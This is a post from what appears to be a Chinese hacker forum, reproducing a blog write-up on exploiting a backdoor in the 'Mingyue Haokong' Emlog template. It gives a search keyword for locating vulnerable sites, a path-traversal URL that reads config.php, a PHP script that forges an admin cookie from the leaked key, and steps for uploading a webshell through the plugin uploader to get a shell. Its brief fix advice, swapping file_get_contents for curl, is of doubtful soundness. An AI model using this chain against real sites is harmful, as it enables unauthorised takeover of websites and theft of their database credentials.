• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Emlog模板明月浩空后门利用解析


JieGe

Recommended Posts

  • Members

0x01 前言

明月浩空,一个Emlog模板的作者,因为在自己设计的模板中,故意安放网站木马后门漏洞,导致模板的使用者遭黑客恶意入侵风险。

0x02 搜索关键词


 
 
/content/templates/limh.me

 
 
 
 
 
 
Emlog模板明月浩空后门利用解析-Ti0s's Blog

0x03 已知后门地址


 
 
view-source: + 域名 + /content/templates/limh.me/function/image.php?url=../../../../config.php

 
 
Emlog模板明月浩空后门利用解析-Ti0s's Blog

这是一个任意文件内容读取的后门 可以读取 数据库等重要信息,这里我们利用计算Emlog 的Cookie来进行伪造管理员登录。

0x04 计算Cookie脚本


 
 
<?php
 
$time=time() + 60 * 60 * 24 * 30 * 12;
 
$key = hash_hmac('md5', 'admin|' . $time, '*****************************'); //这个是Key,admin为要欺骗的管理名
 
$hash=hash_hmac('md5', 'admin|' . $time, $key); //admin为要欺骗的管理名
 
$cookie='admin|' . $time."|".$hash; //admin为要欺骗的管理名
 
echo $cookie;
 
setcookie("*****************************",$cookie); //这个是cookiename
 
?>

 
 
Emlog模板明月浩空后门利用解析-Ti0s's Blog

计算出后,进入后台 默认地址 /admin 利用火狐的插件Cookie Edit加入Cookie Name是 AUTH_COOKIE_NAME 值为计算的

Emlog模板明月浩空后门利用解析-Ti0s's Blog

然后刷新网页 伪造cookie成功

Emlog模板明月浩空后门利用解析-Ti0s's Blog

然后上传插件地方上传大马,进行Getshell

本文章演示仅是本地搭建,请勿对非授权网站进行测试。

0x05 修复方法

将file_get_contents()替换成curl函数,※前提是PHP必须开启curl扩展curl函数呢,比file_get_contents()效率高,速度快,性能好,而且不会读取本地文件。以下是修复好的完整代码

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now